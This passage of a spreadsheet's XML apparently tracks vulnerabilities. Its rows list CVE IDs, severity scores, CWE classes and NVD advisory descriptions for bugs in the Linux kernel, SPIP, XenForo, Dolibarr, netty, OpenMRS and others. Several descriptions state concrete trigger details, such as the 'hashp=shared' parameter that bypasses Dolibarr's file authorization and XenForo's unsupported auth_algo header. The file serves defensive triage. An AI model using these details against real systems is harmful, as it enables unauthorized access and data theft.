IRQ thread, without any local privilege.
The length check in the CEC core runs on the consumer side, after the
byte has been stored, so it does not prevent the overflow. Bound the
index in the driver before the store, as the other platform CEC drivers
already do (e.g. tegra_cec), dropping the excess bytes of an overlong
frame.
Found by static analysis tool CodeQL.</t>
        </is>
      </c>
      <c r="S177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89725</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89729</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr"/>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: sensor-hub: Fix out-of-bounds write in sensor_hub_get_feature
sensor_hub_get_feature() clamps its return value to the caller's buffer
size, but the copy loop still copies field-&gt;report_size / 8 bytes for
each report value. A malicious HID descriptor can advertise a large
feature field size while an IIO caller supplies a small stack buffer,
such as a single s32, causing an out-of-bounds write.
HID core stores parsed report values in __s32 slots and clamps extracted
values to 32 bits. Reject feature fields that require more than one slot
per value, guard the total byte count calculation, and clamp each
per-value copy to the remaining caller buffer.</t>
        </is>
      </c>
      <c r="S178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89729</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19486</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr"/>
      <c r="Q179" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability in Google Cloud Gemini Enterprise Agent Platform App Builder versions prior to 2026-06-01 on Google Cloud Platform allows an unauthenticated attacker to leak the Compute Engine default service account access token.
This vulnerability was patched on 01 June 2026. Users will need to redeploy their previously deployed apps.</t>
        </is>
      </c>
      <c r="S179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19486</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44715</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr"/>
      <c r="Q180" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>OpenMRS is an open source electronic medical record system platform. Prior to versions 1.23.0 and 2.10.0, an authenticated user can trigger administrative DWR services. Specifically, the `startHl7ArchiveMigration` method is accessible, which should be restricted to admin-level accounts. Versions 1.23.0 and 2.10.0 patch the issue.</t>
        </is>
      </c>
      <c r="S180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44715</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48059</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-codec-haproxy</t>
        </is>
      </c>
      <c r="M181" s="5" t="inlineStr">
        <is>
          <t>4.1.135.Final, 4.2.15.Final</t>
        </is>
      </c>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr"/>
      <c r="P181" s="5" t="inlineStr"/>
      <c r="Q181" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-1286</t>
        </is>
      </c>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>### Impact
The HAProxy PROXY protocol v2 codec in netty leaks native or heap memory on every connection when a client sends a syntactically valid header containing nested `PP2_TYPE_SSL` TLVs (type-length-value records) at depth two or greater. The leak occurs on the successful parse path — no exception is thrown, the message fires downstream, the decoder removes itself, and the application releases the `HAProxyMessage` normally. Yet the underlying cumulation buffer (a pooled, potentially direct `ByteBuf` allocated by the channel) remains permanently pinned.</t>
        </is>
      </c>
      <c r="S181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48059</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72708</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>postgresql, mysql</t>
        </is>
      </c>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr"/>
      <c r="Q182" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.18 contains an unauthenticated blind SQL injection vulnerability in the SQL escaping layer that allows unauthenticated attackers to inject arbitrary SQL by supplying a crafted annee parameter value matching a word character followed by an open parenthesis, which bypasses escaping for date-type columns across MySQL, SQLite, and PostgreSQL backends. Attackers can exploit the always-present sitemap.xml.html template's annee criterion to embed unescaped time-based or boolean payloads into database queries, enabling extraction of arbitrary database content including the alea_ephemere secret used to sign SPIP action nonces.</t>
        </is>
      </c>
      <c r="S182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72708</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73314</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr"/>
      <c r="Q183" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a signature verification logic error in the PayPal REST webhook handler that allows unauthenticated attackers to bypass payment signature validation by submitting a webhook request with an unsupported auth_algo header value. When the algorithm cannot be mapped to a supported hash function, the verification function incorrectly returns true instead of failing, causing the caller to treat the fabricated request as verified and process the payment event without a valid PayPal signature.</t>
        </is>
      </c>
      <c r="S183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73316</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr"/>
      <c r="Q184" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a payment replay vulnerability in the PayPal REST payment provider that allows attackers to process the same webhook payload multiple times by exploiting a missing duplicate transaction ID check. Attackers can replay a valid webhook payload to trigger duplicate payment events, resulting in repeated subscription activations and unauthorized account upgrades.</t>
        </is>
      </c>
      <c r="S184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77111</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr"/>
      <c r="Q185" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to bypass security measures and gain unauthorized write access, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80219</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr"/>
      <c r="Q186" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. When deploying Hawtio in cluster mode, the operator creates a cluster-scoped OAuthClient with automatic grant approval (GrantMethod: auto) and no client secret (public client). The redirect URIs are derived from the operator-created Route, whose hostname is tenant-controlled via the Hawtio CR spec.routeHostName field. A malicious tenant can register an arbitrary hostname as a valid OAuth redirect target and, because grants are auto-approved, obtain OpenShift access tokens of any cluster user who visits the crafted authorization URL without any consent prompt.</t>
        </is>
      </c>
      <c r="S186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81532</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K187" s="5" t="inlineStr">
        <is>
          <t>mongodb:bi_connector_odbc_driver</t>
        </is>
      </c>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr"/>
      <c r="Q187" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>A user able to submit SQL through an application using the MongoDB Connector for BI ODBC driver can supply a positioned-cursor statement whose cursor name exceeds the size of an internal fixed-length buffer. Because the name length is not bounded before the driver builds its diagnostic message, memory adjacent to that buffer is overwritten with user-supplied content. This can terminate the hosting application process and may allow unintended code to run within it.</t>
        </is>
      </c>
      <c r="S187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81532</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82578</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr"/>
      <c r="Q188" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>When XML batch processing is turned on and the XPath option is selected, the raw batch input goes through a default XPath/JAXP setup with no entity restrictions, so XXE injection can allow data exfiltration and denial-of-service attacks.</t>
        </is>
      </c>
      <c r="S188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82578</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88260</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>09832df1-09c1-45b4-8a85-16c601d30feb</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr"/>
      <c r="Q189" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-288</t>
        </is>
      </c>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass using an alternate path or channel and Improper validation of syntactic correctness of input vulnerability in Brainzcompany Zenius EMS 8.0 allows Remote Code Inclusion.
This issue affects Zenius EMS 8.0: through OAM (Build 109).</t>
        </is>
      </c>
      <c r="S189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88260</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89013</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr"/>
      <c r="Q190" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>Dolibarr 23.0.4 before 24.0.1 ontains an authorization bypass vulnerability that allows unauthenticated attackers to read arbitrary files through the document storage endpoints by supplying a crafted hashp parameter value. Attackers can send a request with hashp=shared to skip token validation while satisfying the authorization condition in htdocs/document.php and htdocs/viewimage.php, gaining access to application logs, uploaded business documents, database backups containing password hashes, and files belonging to other multicompany entities.</t>
        </is>
      </c>
      <c r="S190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89013</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89146</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr"/>
      <c r="Q191" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-617</t>
        </is>
      </c>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>libp2p-rendezvous through 0.17.1 fails to validate registration TTL values in discovery responses, allowing attackers to trigger timer arithmetic overflow. A malicious rendezvous server can send a discovery response with an unbounded TTL value that causes the client node process to panic when computing the expiry timer.</t>
        </is>
      </c>
      <c r="S191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89146</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89147</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr"/>
      <c r="Q192" s="5" t="inlineStr">
        <is>
          <t>CWE-1088, CWE-400</t>
        </is>
      </c>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>Net-SNMP through 5.9.5.2 contains a denial of service vulnerability in the SMUX module where smux_accept() performs an unauthenticated blocking read without timeout on newly accepted connections. An unauthenticated remote client can connect to the SMUX listener and send no data, causing the single-threaded snmpd main loop to block indefinitely and suspend all SNMP processing.</t>
        </is>
      </c>
      <c r="S192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89147</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89174</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr"/>
      <c r="Q193" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>Smart Video Intercom System developed by Kingdom Communication Associated has a Missing Brute-force Protection vulnerability. Unauthenticated remote attackers can gain access to valid accounts through a large number of login attempts.</t>
        </is>
      </c>
      <c r="S193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89174</t>
